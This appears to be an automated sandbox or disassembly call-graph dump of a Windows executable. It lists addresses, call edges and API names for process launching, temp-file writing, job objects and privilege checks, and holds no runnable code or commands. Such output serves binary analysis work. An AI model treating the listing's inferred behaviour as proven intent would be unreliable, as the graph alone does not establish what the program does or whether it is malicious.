11085->11089 11090 4073a7 ??3@YAXPAX 11086->11090 11096 404952 22 API calls 11086->11096 11763 405793 11087->11763 11092 406e48 11088->11092 11762 4081be ??3@YAXPAX 11089->11762 11090->11062 11098 404ccf 2 API calls 11092->11098 11093 406e8c 11095 401403 2 API calls 11093->11095 11099 406e95 11095->11099 11100 40735e 11096->11100 11101 406e55 11098->11101 11103 4044e2 20 API calls 11099->11103 11749 4051f3 11100->11749 11106 40143c 2 API calls 11101->11106 11102 4072ac ??3@YAXPAX ??3@YAXPAX 11102->11086 11122 406e9e 11103->11122 11104 401403 2 API calls 11104->11107 11109 406e61 ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 11106->11109 11107->11075 11107->11079 11107->11084 11107->11093 11107->11102 11107->11104 11110 401795 2 API calls 11107->11110 11108 407377 SetCurrentDirectoryW 11111 4051f3 4 API calls 11108->11111 11112 406e88 11109->11112 11113 40725d 11109->11113 11115 406f2c ??3@YAXPAX ??3@YAXPAX 11110->11115 11116 40739f 11111->11116 11112->11093 11114 40477e 16 API calls 11113->11114 11117 407262 11114->11117 11115->11107 11118 40477e 16 API calls 11116->11118 11119 409606 57 API calls 11117->11119 11118->11090 11120 40726b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11119->11120 11120->11030 11121 4072a1 11120->11121 11121->11030 11123 406fcb _wtol 11122->11123 11124 40453f lstrlenW lstrlenW _wcsnicmp 11122->11124 11125 40708f 11122->11125 11123->11122 11124->11122 11126 407098 11125->11126 11127 4070ea 11125->11127 11128 4070bd 11126->11128 11129 40709e 11126->11129 11130 40143c 2 API calls 11127->11130 11133 401403 2 API calls 11128->11133 11131 401403 2 API calls 11129->11131 11132 4070e8 11130->11132 11134 4070a9 11131->11134 11135 402ab8 2 API calls 11132->11135 11136 4070bb 11133->11136 11137 402ab8 2 API calls 11134->11137 11138 4070fc 11135->11138 11139 4029a6 lstrcmpW 11136->11139 11140 4070b2 11137->11140 11141 4014eb 2 API calls 11138->11141 11142 4070d2 11139->11142 11143 402ab8 2 API calls 11140->11143 11144 407104 11141->11144 11142->11138 11145 402ab8 2 API calls 11142->11145 11143->11136 11146 404e9f 2 API calls 11144->11146 11145->11132 11147 407111 11146->11147 11148 402a67 2 API calls 11147->11148 11149 40711c 11148->11149 11150 4044e2 20 API calls 11149->11150 11151 407125 11150->11151 11152 407200 11151->11152 11427 402713 11151->11427 11154 40732e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11152->11154 11156 407214 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11152->11156 11154->11086 11155 40713a 11155->11152 11157 407154 11155->11157 11158 402ab8 2 API calls 11155->11158 11156->11082 11159 4044e2 20 API calls 11157->11159 11158->11157 11160 40716c 11159->11160 11161 4071e2 11160->11161 11162 407173 11160->11162 11701 405489 11161->11701 11436 404cb1 11162->11436 11165 4071f0 11167 4072cb SetLastError 11165->11167 11168 4071fb 11165->11168 11172 4072d2 11167->11172 11746 4026ab 11168->11746 11174 409606 57 API calls 11172->11174 11173 4017c0 2 API calls 11175 4071a8 ??3@YAXPAX ??3@YAXPAX 11173->11175 11176 4072dc 11174->11176 11446 4053b2 11175->11446 11178 40477e 16 API calls 11176->11178 11180 4072e1 7 API calls 11178->11180 11179 4071cc 11182 4072c3 ??3@YAXPAX 11179->11182 11183 4071da ??3@YAXPAX 11179->11183 11181 407321 11180->11181 11181->11154 11182->11172 11183->11168 11185 40204c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 11184->11185 11186 40207f GetVersionExW 11184->11186 11185->11186 11186->10784 11186->10785 11188 4011b7 2 API calls 11187->11188 11189 4047a9 GetCommandLineW 11188->11189 11190 404e9f 11189->11190 11191 404ed9 11190->11191 11192 404ead 11190->11192 11193 404ed1 11191->11193 11195 401795 2 API calls 11191->11195 11192->11193 11194 401795 2 API calls 11192->11194 11193->10796 11194->11192 11195->11191 11197 4014eb 2 API calls 11196->11197 11205 4030dc 11197->11205 11198 4031c2 11199 40143c 2 API calls 11198->11199 11200 4031cf ??3@YAXPAX 11199->11200 11200->10799 11201 401795 ??2@YAPAXI ??3@YAXPAX 11201->11205 11203 4014eb 2 API calls 11203->11205 11205->11198 11205->11201 11205->11203 11206 40143c 2 API calls 11205->11206 11802 402b31 11205->11802 11805 402dce 11205->11805 11207 40313c ??3@YAXPAX 11206->11207 11208 4014bc 2 API calls 11207->11208 11209 403151 ??3@YAXPAX ??3@YAXPAX 11208->11209 11209->11205 11211 4014eb 2 API calls 11210->11211 11212 40575d 11211->11212 11213 4014eb 2 API calls 11212->11213 11214 405765 11213->11214 11215 401403 2 API calls 11214->11215 11216 405770 11215->11216 11217 401403 2 API calls 11216->11217 11218 40577b 11217->11218 11219 4035cf 7 API calls 11218->11219 11220 405789 11219->11220 11820 402990 ??3@YAXPAX ??3@YAXPAX 11220->11820 11222 405791 11223 402696 11222->11223 11821 402665 LoadLibraryA GetProcAddress 11223->11821 11225 40269b 11225->10804 11227 404d22 11226->11227 11228 402427 3 API calls 11227->11228 11229 404d27 11228->11229 11230 40247d 19 API calls 11229->11230 11231 404d2e 11230->11231 11232 40247d 19 API calls 11231->11232 11233 404d3a 11232->11233 11234 40247d 19 API calls 11233->11234 11235 404d46 11234->11235 11236 40247d 19 API calls 11235->11236 11237 404d52 11236->11237 11238 40247d 19 API calls 11237->11238 11239 404d5e 11238->11239 11240 40247d 19 API calls 11239->11240 11241 404d6a 11240->11241 11242 40247d 19 API calls 11241->11242 11248 404d76 11242->11248 11243 404d91 SHGetSpecialFolderPathW 11244 404dab wsprintfW 11243->11244 11243->11248 11245 4014eb 2 API calls 11244->11245 11245->11248 11246 404e44 11246->10810 11246->10811 11247 4014eb 2 API calls 11247->11248 11248->11243 11248->11246 11248->11247 11250 401403 ??2@YAPAXI ??3@YAXPAX 11248->11250 11251 4035cf 7 API calls 11248->11251 11824 402990 ??3@YAXPAX ??3@YAXPAX 11248->11824 11250->11248 11251->11248 11253 4046f1 11252->11253 11254 40472e 11253->11254 11255 40470b lstrlenW lstrlenW 11253->11255 11254->10818 11254->10820 11825 401f6a 11255->11825 11835 4123c1 11257->11835 11261 402805 2 API calls 11260->11261 11262 402b2d 11261->11262 11263 403f89 11262->11263 11264 402665 3 API calls 11263->11264 11265 403f97 11264->11265 11266 402b19 2 API calls 11265->11266 11267 403fd0 11266->11267 11268 402b19 2 API calls 11267->11268 11269 403fd8 11268->11269 11270 402b19 2 API calls 11269->11270 11271 403fe0 11270->11271 11841 403e98 11271->11841 11277 404076 11278 403e98 7 API calls 11277->11278 11280 40408c 11278->11280 11279 403e98 7 API calls 11284 40401d 11279->11284 11281 402ee4 10 API calls 11280->11281 11283 40409e 11281->11283 11282 402ee4 10 API calls 11282->11284 11884 402c7f 11283->11884 11284->11277 11284->11279 11284->11282 11286 402c7f 2 API calls 11284->11286 11887 402c49 11284->11887 11286->11284 11288 404114 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11288->10878 11289 403e98 7 API calls 11291 4040b4 11289->11291 11290 402ee4 10 API calls 11290->11291 11291->11288 11291->11289 11291->11290 11292 402c49 2 API calls 11291->11292 11293 402c7f 2 API calls 11291->11293 11292->11291 11293->11291 11930 412709 11294->11930 11298 4029a6 lstrcmpW 11297->11298 11299 404f27 11298->11299 11300 404f77 11299->11300 11302 401403 2 API calls 11299->11302 11301 4029a6 lstrcmpW 11300->11301 11303 404f95 11301->11303 11304 404f3e 11302->11304 11306 4029a6 lstrcmpW 11303->11306 11305 40247d 19 API calls 11304->11305 11307 404f45 11305->11307 11308 404fad 11306->11308 11309 402ab8 2 API calls 11307->11309 11311 4029a6 lstrcmpW 11308->11311 11310 404f4e 11309->11310 11312 401403 2 API calls 11310->11312 11313 404fc5 11311->11313 11314 404f67 11312->11314 11316 4029a6 lstrcmpW 11313->11316 11315 40247d 19 API calls 11314->11315 11317 404f6e 11315->11317 11318 404fdd 11316->11318 11319 402ab8 2 API calls 11317->11319 11320 404fe4 lstrcmpiW 11318->11320 11321 404ff4 11318->11321 11319->11300 11320->11321 11322 4029a6 lstrcmpW 11321->11322 11323 40500a 11322->11323 11324 4029a6 lstrcmpW 11323->11324 11325 405037 11324->11325 11328 405044 11325->11328 11956 404690 11325->11956 11327 4029a6 lstrcmpW 11332 405058 11327->11332 11328->11327 11329 405078 11331 4029a6 lstrcmpW 11329->11331 11338 40508b 11331->11338 11332->11329 11333 4029a6 lstrcmpW 11332->11333 11960 404637 11332->11960 11333->11332 11334 4050ab 11336 4029a6 lstrcmpW 11334->11336 11337 4050b7 11336->11337 11339 4029a6 lstrcmpW 11337->11339 11338->11334 11340 4029a6 lstrcmpW 11338->11340 11964 404668 11338->11964 11341 4050c8 11339->11341 11340->11338 11342 4029a6 lstrcmpW 11341->11342 11343 4050d9 11342->11343 11344 4050e6 _wtol 11343->11344 11345 4050ef 11343->11345 11344->11345 11346 4029a6 lstrcmpW 11345->11346 11347 4050fb 11346->11347 11348 405102 _wtol 11347->11348 11349 40510b 11347->11349 11348->11349 11350 4029a6 lstrcmpW 11349->11350 11351 405117 11350->11351 11352 4029a6 lstrcmpW 11351->11352 11353 40512f 11352->11353 11354 4029a6 lstrcmpW 11353->11354 11355 405147 11354->11355 11356 4029a6 lstrcmpW 11355->11356 11357 40515f 11356->11357 11358 4029a6 lstrcmpW 11357->11358 11359 40517c 11358->11359 11360 40518d 11359->11360 11361 40247d 19 API calls 11359->11361 11360->10901 11361->11360 11363 404c17 11362->11363 11364 404c2e 11363->11364 11365 404c23 11363->11365 11366 4014eb 2 API calls 11364->11366 11367 4013d1 2 API calls 11365->11367 11368 404c37 11366->11368 11370 404c2c 11367->11370 11369 4011b7 2 API calls 11368->11369 11371 404c40 11369->11371 11370->10924 11372 4013d1 2 API calls 11371->11372 11373 404c73 ??3@YAXPAX 11372->11373 11373->11370 11972 404c84 11374->11972 11380 404c84 2 API calls 11379->11380 11381 405962 11380->11381 11990 404813 11381->11990 11994 402910 11384->11994 11388 404963 11387->11388 11389 4049a6 11387->11389 11390 4013d1 2 API calls 11388->11390 11391 4044e2 20 API calls 11388->11391 11389->10950 11389->10955 11390->11388 11392 404980 SetEnvironmentVariableW ??3@YAXPAX 11391->11392 11392->11388 11392->11389 11394 4015f2 ??2@YAPAXI 11393->11394 11399 4015ea 11393->11399 11395 401601 11394->11395 11405 412a6a 3 API calls 11395->11405 11396 401623 11998 40113f 11396->11998 11398 401647 11398->11399 11400 412574 VariantClear 11398->11400 11401 4016aa 11398->11401 11399->11020 11399->11052 11400->11398 12003 401556 11401->12003 11404 412574 VariantClear 11404->11399 11405->11396 11407 4019eb 11406->11407 11426 412a6a 3 API calls 11407->11426 11408 401a0f 11409 401a90 11408->11409 11410 401a21 ??2@YAPAXI 11408->11410 11412 409606 57 API calls 11409->11412 11411 401a2d 11410->11411 11413 40113f 180 API calls 11411->11413 11425 401aa9 11412->11425 11414 401a5a 11413->11414 11414->11409 11415 401a61 11414->11415 11416 401a79 ??2@YAPAXI 11415->11416 11417 4039e7 88 API calls 11415->11417 11418 401a85 11416->11418 11419 401a8c 11416->11419 11420 401a74 11417->11420 12632 4016d4 11418->12632 11422 4015d8 182 API calls 11419->11422 11420->11416 11420->11425 11423 401ad3 11422->11423 12613 401880 11423->12613 11425->11055 11426->11408 11428 402721 11427->11428 11429 40271c 11427->11429 11430 402665 3 API calls 11428->11430 11429->11155 11431 402726 11430->11431 11432 402737 11431->11432 11433 402730 11431->11433 11432->11155 12643 4026df LoadLibraryA GetProcAddress 11433->12643 11437 404794 2 API calls 11436->11437 11438 404cbf 11437->11438 11439 4014bc 2 API calls 11438->11439 11440 404cca 11439->11440 11441 404ccf 11440->11441 11442 4013d1 2 API calls 11441->11442 11443 404cdd 11442->11443 11444 402ab8 2 API calls 11443->11444 11445 404ce8 11444->11445 11445->11173 11447 4014eb 2 API calls 11446->11447 11448 4053c3 11447->11448 11449 4014eb 2 API calls 11448->11449 11450 4053cb memset 11449->11450 11451 4053f9 11450->11451 11452 404e9f 2 API calls 11451->11452 11453 40541c 11452->11453 11454 401403 2 API calls 11453->11454 11455 405427 11454->11455 11456 405445 ShellExecuteExW 11455->11456 11457 40542c ??3@YAXPAX 11455->11457 11459 405485 11456->11459 11460 40545f 11456->11460 11458 405437 ??3@YAXPAX 11457->11458 11458->11179 11461 40547c ??3@YAXPAX 11459->11461 11462 405473 CloseHandle 11460->11462 11463 405468 WaitForSingleObject 11460->11463 11461->11458 11462->11461 11463->11462 11465 4083ea 4 API calls 11464->11465 11466 4052fa 11465->11466 11467 40247d 19 API calls 11466->11467 11468 405308 11467->11468 11469 402a67 2 API calls 11468->11469 11471 405312 11469->11471 11470 405348 wsprintfW 11472 402ab8 2 API calls 11470->11472 11471->11470 11474 402ab8 ??2@YAPAXI ??3@YAXPAX 11471->11474 11473 40537c 11472->11473 11475 402ab8 2 API calls 11473->11475 11474->11471 11476 405389 11475->11476 11477 40844b 22 API calls 11476->11477 11478 40539e ??3@YAXPAX 11477->11478 12645 4081be ??3@YAXPAX 11478->12645 11480 4053af 11480->11030 11482 4127e6 ctype 3 API calls 11481->11482 11483 4047ef 11482->11483 11484 412709 ctype 3 API calls 11483->11484 11485 41286e ??3@YAXPAX 11484->11485 11485->10832 11487 4056ff 11486->11487 11493 40571b 11486->11493 11490 405711 _wtol 11487->11490 11487->11493 11488 4053b2 9 API calls 11489 40573e 11488->11489 11491 405746 GetLastError 11489->11491 11492 40574c 11489->11492 11490->11493 11491->11492 11492->11030 11493->11488 11495 412468 2 API calls 11494->11495 11496 4059c8 11495->11496 11497 405a24 11496->11497 11499 402a67 2 API calls 11496->11499 11498 402b19 2 API calls 11497->11498 11500 405a2c 11498->11500 11502 4059d7 11499->11502 11501 402baf 2 API calls 11500->11501 11503 405a39 11501->11503 11504 405a95 ??3@YAXPAX 11502->11504 11506 4039e7 88 API calls 11502->11506 11505 402c49 2 API calls 11503->11505 11519 405a91 11504->11519 11507 405a46 11505->11507 11508 4059fb 11506->11508 11509 402c49 2 API calls 11507->11509 11508->11504 11512 412468 2 API calls 11508->11512 11510 405a53 11509->11510 11511 402c49 2 API calls 11510->11511 11513 405a60 11511->11513 11514 405a17 11512->11514 11515 412ace 2 API calls 11513->11515 11514->11504 11516 405a1b ??3@YAXPAX 11514->11516 11517 405a74 11515->11517 11516->11497 11517->11504 11518 405a7d ??3@YAXPAX 11517->11518 11518->11519 11519->10902 11520 4036f6 11521 402b19 2 API calls 11520->11521 11546 40370b 11521->11546 11522 4039aa ??3@YAXPAX 11523 4039e1 11522->11523 11523->10888 11523->10892 11524 4014eb ??2@YAPAXI ??3@YAXPAX 11524->11546 11525 402b19 2 API calls 11525->11546 11526 402dce ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 11526->11546 11527 40143c 2 API calls 11528 40377c ??3@YAXPAX ??3@YAXPAX 11527->11528 11529 4039b6 11528->11529 11528->11546 12651 403026 11529->12651 11533 4039d7 ??3@YAXPAX 11533->11523 11534 403889 strncmp 11536 403874 strncmp 11534->11536 11534->11546 11536->11534 11536->11546 11538 402c21 ??2@YAPAXI ??3@YAXPAX 11538->11546 11539 40143c 2 API calls 11541 4038f6 ??3@YAXPAX 11539->11541 11540 402c21 2 API calls 11540->11536 11542 4030cc 9 API calls 11541->11542 11543 403907 lstrcmpW 11542->11543 11543->11546 11544 40393e lstrlenW wcsncmp 11544->11546 11545 402910 lstrcmpW 11545->11546 11546->11522 11546->11524 11546->11525 11546->11526 11546->11527 11546->11529 11546->11534 11546->11538 11546->11539 11546->11540 11546->11544 11546->11545 11547 4035cf 7 API calls 11546->11547 11548 401403 2 API calls 11546->11548 12646 402958 11546->12646 12650 402990 ??3@YAXPAX ??3@YAXPAX 11546->12650 11547->11546 11548->11546 11550 402a67 2 API calls 11549->11550 11551 4051a7 11550->11551 11552 402ab8 2 API calls 11551->11552 11557 4051b4 11552->11557 11553 4051d0 11554 402ab8 2 API calls 11553->11554 11556 4051da 11554->11556 11555 401795 2 API calls 11555->11557 11558 4049a9 94 API calls 11556->11558 11557->11553 11557->11555 11559 4051e5 ??3@YAXPAX 11558->11559 11559->10956 11561 4049c0 lstrlenW 11560->11561 11562 4049ec 11560->11562 11563 401f6a CharUpperW 11561->11563 11562->10956 11564 4049d6 11563->11564 11564->11561 11564->11562 11565 4049f3 11564->11565 11566 402a67 2 API calls 11565->11566 11569 4049fc 11566->11569 12670 402e16 11569->12670 11570 4036f6 87 API calls 11571 404a6a 11570->11571 11572 404a74 ??3@YAXPAX ??3@YAXPAX 11571->11572 11573 404a8b ??3@YAXPAX ??3@YAXPAX 11571->11573 11572->11562 11573->11562 11575 401403 2 API calls 11574->11575 11576 401511 ??3@YAXPAX 11575->11576 11576->10956 11578 4027a1 11577->11578 11579 402787 CheckTokenMembership FreeSid 11577->11579 11578->10936 11578->10940 11579->11578 11581 4013d1 2 API calls 11580->11581 11582 404cfb 11581->11582 11583 401795 2 API calls 11582->11583 11584 404d06 11583->11584 11584->11002 11586 4035e9 11585->11586 11587 4035de 11585->11587 11589 416407 4 API calls 11586->11589 12680 402cad 11587->12680 11590 4035f5 11589->11590 11590->10986 11591->11003 11593 4083ea 4 API calls 11592->11593 11594 40449d 11593->11594 11594->10979 11595->10993 11599 409815 11596->11599 11604 409a82 11596->11604 11597 4029a6 lstrcmpW 11597->11599 11598 408c6a 25 API calls 11598->11599 11599->11597 11599->11598 11600 401556 6 API calls 11599->11600 11601 4083ea 4 API calls 11599->11601 11602 408bec 25 API calls 11599->11602 11603 408caa 25 API calls 11599->11603 11599->11604 11605 404495 4 API calls 11599->11605 11607 40247d 19 API calls 11599->11607 11608 409599 27 API calls 11599->11608 11609 409606 57 API calls 11599->11609 11611 404765 4 API calls 11599->11611 11612 40844b 22 API calls 11599->11612 12685 4084c5 11599->12685 12689 4081be ??3@YAXPAX 11599->12689 11600->11599 11601->11599 11602->11599 11603->11599 11604->11010 11605->11599 11607->11599 11608->11599 11609->11599 11611->11599 11612->11599 11614 4029a6 lstrcmpW 11613->11614 11615 40970f 11614->11615 11618 40971d 11615->11618 12690 401ed5 GetStdHandle WriteFile 11615->12690 11617 409730 11620 409745 11617->11620 12692 401ed5 GetStdHandle WriteFile 11617->12692 11618->11617 12691 401ed5 GetStdHandle WriteFile 11618->12691 11621 409756 11620->11621 12693 401ed5 GetStdHandle WriteFile 11620->12693 11624 4029a6 lstrcmpW 11621->11624 11625 409763 11624->11625 11626 409771 11625->11626 12694 401ed5 GetStdHandle WriteFile 11625->12694 11628 4029a6 lstrcmpW 11626->11628 11629 40977e 11628->11629 11630 40978c 11629->11630 12695 401ed5 GetStdHandle WriteFile 11629->12695 11631 4029a6 lstrcmpW 11630->11631 11633 409799 11631->11633 11634 4097a7 11633->11634 12696 401ed5 GetStdHandle WriteFile 11633->12696 11636 4029a6 lstrcmpW 11634->11636 11637 4097b4 11636->11637 11638 4097c2 11637->11638 12697 401ed5 GetStdHandle WriteFile 11637->12697 11640 4029a6 lstrcmpW 11638->11640 11641 4097cf 11640->11641 11642 4097e2 11641->11642 11644 4029a6 lstrcmpW 11641->11644 11645 4097f0 11642->11645 12698 401ed5 GetStdHandle WriteFile 11642->12698 11644->11642 11645->11004 11647 408c0f 11646->11647 11648 408c42 11647->11648 11649 408c24 11647->11649 12702 4085f7 11648->12702 12699 4085de 11649->12699 11654 40844b 22 API calls 11656 408c3d 11654->11656 11655 40844b 22 API calls 11655->11656 12705 4081be ??3@YAXPAX 11656->12705 11658 408c65 11658->11052 11660 408c7f 11659->11660 11661 4010bd 4 API calls 11660->11661 11662 408c8a 11661->11662 11663 40844b 22 API calls 11662->11663 11664 408c9b 11663->11664 12706 4081be ??3@YAXPAX 11664->12706 11666 408ca5 11666->11052 11668 4014eb 2 API calls 11667->11668 11669 4048b4 11668->11669 11670 402aa0 2 API calls 11669->11670 11671 4048bd GetTempPathW 11670->11671 11672 4048d6 11671->11672 11677 4048ed 11671->11677 11673 402aa0 2 API calls 11672->11673 11674 4048e1 GetTempPathW 11673->11674 11674->11677 11675 402aa0 2 API calls 11676 404910 wsprintfW 11675->11676 11676->11677 11677->11675 11678 404927 GetFileAttributesW 11677->11678 11679 40494b 11677->11679 11678->11677 11678->11679 11679->11037 11681 408cbd 11680->11681 12707 40862c 11681->12707 11684 40844b 22 API calls 11685 408cf2 11684->11685 12710 4081be ??3@YAXPAX 11685->12710 11687 408cfc 11687->11055 11689 404787 11688->11689 11691 404792 ??3@YAXPAX ??3@YAXPAX 11688->11691 11690 4032e9 16 API calls 11689->11690 11690->11691 11691->11030 11693 4029a6 lstrcmpW 11692->11693 11695 404e68 11693->11695 11694 404e9d 11694->11107 11695->11694 11696 401403 2 API calls 11695->11696 11697 404e77 11696->11697 11698 4044e2 20 API calls 11697->11698 11699 404e7d 11698->11699 11699->11694 11700 401795 2 API calls 11699->11700 11700->11694 11702 4014eb 2 API calls 11701->11702 11703 40549e 11702->11703 11704 4014eb 2 API calls 11703->11704 11705 4054a6 GetCommandLineW 11704->11705 11706 404e9f 2 API calls 11705->11706 11707 4054b6 11706->11707 11708 404cb1 2 API calls 11707->11708 11709 4054e9 11708->11709 11710 404ccf 2 API calls 11709->11710 11711 4054f6 11710->11711 11712 404ccf 2 API calls 11711->11712 11713 405503 11712->11713 11714 404ced 2 API calls 11713->11714 11715 405510 11714->11715 11716 404ced 2 API calls 11715->11716 11717 40551d 11716->11717 11718 404ced 2 API calls 11717->11718 11719 40552a 11718->11719 11720 404ced 2 API calls 11719->11720 11721 405537 11720->11721 11722 404ccf 2 API calls 11721->11722 11723 405544 11722->11723 11724 404ccf 2 API calls 11723->11724 11725 405551 11724->11725 11726 404ccf 2 API calls 11725->11726 11727 40555e 11726->11727 11728 40143c 2 API calls 11727->11728 11729 40556a 12 API calls 11728->11729 11730 405622 CreateJobObjectW 11729->11730 11731 4055ff GetLastError 11729->11731 11733 40563a AssignProcessToJobObject 11730->11733 11734 40569d ResumeThread WaitForSingleObject 11730->11734 11732 405607 ??3@YAXPAX ??3@YAXPAX 11731->11732 11732->11165 11733->11734 11735 405648 CreateIoCompletionPort 11733->11735 11736 4056ad CloseHandle GetExitCodeProcess 11734->11736 11735->11734 11737 40565a SetInformationJobObject ResumeThread 11735->11737 11738 4056d3 CloseHandle 11736->11738 11739 4056ca GetLastError 11736->11739 11742 405688 GetQueuedCompletionStatus 11737->11742 11740 4056dc CloseHandle 11738->11740 11741 4056df 11738->11741 11739->11738 11740->11741 11743 4056e5 CloseHandle 11741->11743 11744 4056ea 11741->11744 11742->11734 11745 405682 11742->11745 11743->11744 11744->11732 11745->11736 11745->11742 11747 4026b4 LoadLibraryA GetProcAddress 11746->11747 11748 4026cf 11746->11748 11747->11748 11748->11152 11750 4014eb 2 API calls 11749->11750 11758 405204 11750->11758 11751 401403 2 API calls 11751->11758 11752 405296 11753 4052d0 ??3@YAXPAX 11752->11753 11755 4051f3 3 API calls 11752->11755 11753->11108 11754 401795 2 API calls 11754->11758 11757 4052cd 11755->11757 11756 4029a6 lstrcmpW 11756->11758 11757->11753 11758->11751 11758->11752 11758->11754 11758->11756 11760 4083ea 4 API calls 11759->11760 11761 40476d 11760->11761 11761->11085 11762->11065 11764 405945 ??3@YAXPAX 11763->11764 11765 4057a9 11763->11765 11767 40594b 11764->11767 11765->11764 11766 4057bd GetDriveTypeW 11765->11766 11766->11764 11768 4057e9 11766->11768 11767->11066 11769 4048a3 6 API calls 11768->11769 11770 4057f7 CreateFileW 11769->11770 11771 40581d 11770->11771 11772 40590f ??3@YAXPAX ??3@YAXPAX 11770->11772 11773 4014eb 2 API calls 11771->11773 11772->11767 11774 405826 11773->11774 11775 401403 2 API calls 11774->11775 11776 405833 11775->11776 11777 402ab8 2 API calls 11776->11777 11778 405841 11777->11778 11779 4014bc 2 API calls 11778->11779 11780 40584d 11779->11780 11781 402ab8 2 API calls 11780->11781 11782 40585b 11781->11782 11783 402ab8 2 API calls 11782->11783 11784 405868 11783->11784 11785 4014bc 2 API calls 11784->11785 11786 405874 11785->11786 11787 402ab8 2 API calls 11786->11787 11788 405881 11787->11788 11789 402ab8 2 API calls 11788->11789 11790 40588a 11789->11790 11791 4014bc 2 API calls 11790->11791 11792 405896 11791->11792 11793 402ab8 2 API calls 11792->11793 11794 40589f 11793->11794 11795 402e16 3 API calls 11794->11795 11796 4058b1 WriteFile ??3@YAXPAX CloseHandle 11795->11796 11797 405920 11796->11797 11798 4058df 11796->11798 11799 4032e9 16 API calls 11797->11799 11798->11797 11800 4058e7 SetFileAttributesW ShellExecuteW ??3@YAXPAX 11798->11800 11801 405928 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11799->11801 11800->11772 11801->11767 11811 402805 11802->11811 11806 4014eb 2 API calls 11805->11806 11807 402dda 11806->11807 11808 402e12 11807->11808 11816 402aa0 11807->11816 11808->11205 11812 402813 ??2@YAPAXI 11811->11812 11813 40283f 11811->11813 11812->11813 11814 402824 ??3@YAXPAX 11812->11814 11813->11205 11814->11813 11817 402ab2 MultiByteToWideChar 11816->11817 11818 402aac 11816->11818 11817->11808 11819 4011b7 2 API calls 11818->11819 11819->11817 11820->11222 11822 402692 11821->11822 11823 402686 GetNativeSystemInfo 11821->11823 11822->11225 11823->11225 11824->11248 11826 401fb8 11825->11826 11828 401f78 11825->11828 11826->11254 11827 4126c0 CharUpperW 11827->11828 11828->11826 11828->11827 11829 401fc5 11828->11829 11833 4126c0 CharUpperW 11829->11833 11831 401fd5 11834 4126c0 CharUpperW 11831->11834 11833->11831 11834->11826 11838 4123a4 11835->11838 11839 41236b 2 API calls 11838->11839 11840 40614b 11839->11840 11840->10871 11840->10872 11891 402baf 11841->11891 11844 402baf 2 API calls 11845 403ebf 11844->11845 11895 402d03 11845->11895 11848 402be9 2 API calls 11849 403edc ??3@YAXPAX 11848->11849 11850 402d03 3 API calls 11849->11850 11851 403ef7 11850->11851 11852 402be9 2 API calls 11851->11852 11853 403f02 ??3@YAXPAX 11852->11853 11854 403f42 11853->11854 11855 403f18 11853->11855 11856 403f48 wsprintfA 11854->11856 11857 403f6f 11854->11857 11855->11854 11858 403f1d wsprintfA 11855->11858 11859 402c49 2 API calls 11856->11859 11860 402c49 2 API calls 11857->11860 11861 402c49 2 API calls 11858->11861 11862 403f64 11859->11862 11863 403f7c 11860->11863 11864 403f37 11861->11864 11866 402c49 2 API calls 11862->11866 11867 402c49 2 API calls 11863->11867 11865 402c49 2 API calls 11864->11865 11865->11854 11866->11857 11868 403f84 11867->11868 11869 402ee4 11868->11869 11870 402ef1 11869->11870 11910 412a6a 11870->11910 11872 402f30 11873 402fb8 memcmp 11872->11873 11874 402fdb memmove 11872->11874 11875 402f7b memcmp 11872->11875 11876 40300e 11872->11876 11916 412a36 11872->11916 11920 402c21 11872->11920 11873->11872 11874->11872 11874->11876 11875->11872 11875->11876 11880 402be9 11876->11880 11881 402bf5 11880->11881 11883 402c06 11880->11883 11882 402805 2 API calls 11881->11882 11882->11883 11883->11284 11885 402851 2 API calls 11884->11885 11886 402c8f 11885->11886 11886->11291 11888 402c58 11887->11888 11888->11888 11889 402851 2 API calls 11888->11889 11890 402c65 11889->11890 11890->11284 11892 402bc5 11891->11892 11892->11892 11893 402805 2 API calls 11892->11893 11894 402bd2 11893->11894 11894->11844 11896 402d1e 11895->11896 11897 402d35 11896->11897 11898 402d2a 11896->11898 11899 402b19 2 API calls 11897->11899 11907 402b61 11898->11907 11901 402d3e 11899->11901 11903 402805 2 API calls 11901->11903 11902 402d33 11902->11848 11904 402d47 11903->11904 11905 402b61 2 API calls 11904->11905 11906 402d75 ??3@YAXPAX 11905->11906 11906->11902 11908 402805 2 API calls 11907->11908 11909 402b7c 11908->11909 11909->11902 11911 412a7a 11910->11911 11912 402f03 lstrlenA lstrlenA 11910->11912 11923 412305 SetFilePointer 11911->11923 11912->11872 11915 4129fa GetLastError 11915->11912 11917 412a4e 11916->11917 11918 4129fa GetLastError 11917->11918 11919 412a65 11918->11919 11919->11872 11926 402851 11920->11926 11924 412338 11923->11924 11925 41232e GetLastError 11923->11925 11924->11915 11925->11924 11927 402895 11926->11927 11928 402865 11926->11928 11927->11872 11929 402805 2 API calls 11928->11929 11929->11927 11935 401ff0 11930->11935 11938 412260 11930->11938 11943 4132c1 11930->11943 11931 40624e 11931->10888 11931->11520 11936 401ff7 VirtualFree 11935->11936 11937 402008 11935->11937 11936->11937 11937->11931 11939 412280 11938->11939 11940 41226e 11938->11940 11939->11931 11948 411e20 11940->11948 11944 4132de 11943->11944 11945 4132ce 11943->11945 11944->11931 11953 412bb5 11945->11953 11949 401ff0 VirtualFree 11948->11949 11950 411e39 11949->11950 11951 401ff0 VirtualFree 11950->11951 11952 411e65 ??3@YAXPAX 11951->11952 11952->11939 11954 401ff0 VirtualFree 11953->11954 11955 412bf7 ??3@YAXPAX 11954->11955 11955->11944 11957 4046ae 11956->11957 11968 4045d4 11957->11968 11961 404644 11960->11961 11962 4045d4 _wtol 11961->11962 11963 404665 11962->11963 11963->11332 11965 404675 11964->11965 11966 4045d4 _wtol 11965->11966 11967 40468d 11966->11967 11967->11338 11971 4045de 11968->11971 11969 4045f9 _wtol 11969->11971 11970 404632 11970->11328 11971->11969 11971->11970 11973 4014eb 2 API calls 11972->11973 11974 404c90 11973->11974 11975 401795 2 API calls 11974->11975 11976 404c99 11975->11976 11977 401795 2 API calls 11976->11977 11978 404ca2 11977->11978 11979 401795 2 API calls 11978->11979 11980 404cab 11979->11980 11981 40484d 11980->11981 11982 40489d ??3@YAXPAX 11981->11982 11983 40485e 11981->11983 11982->10929 11983->11982 11985 402cce 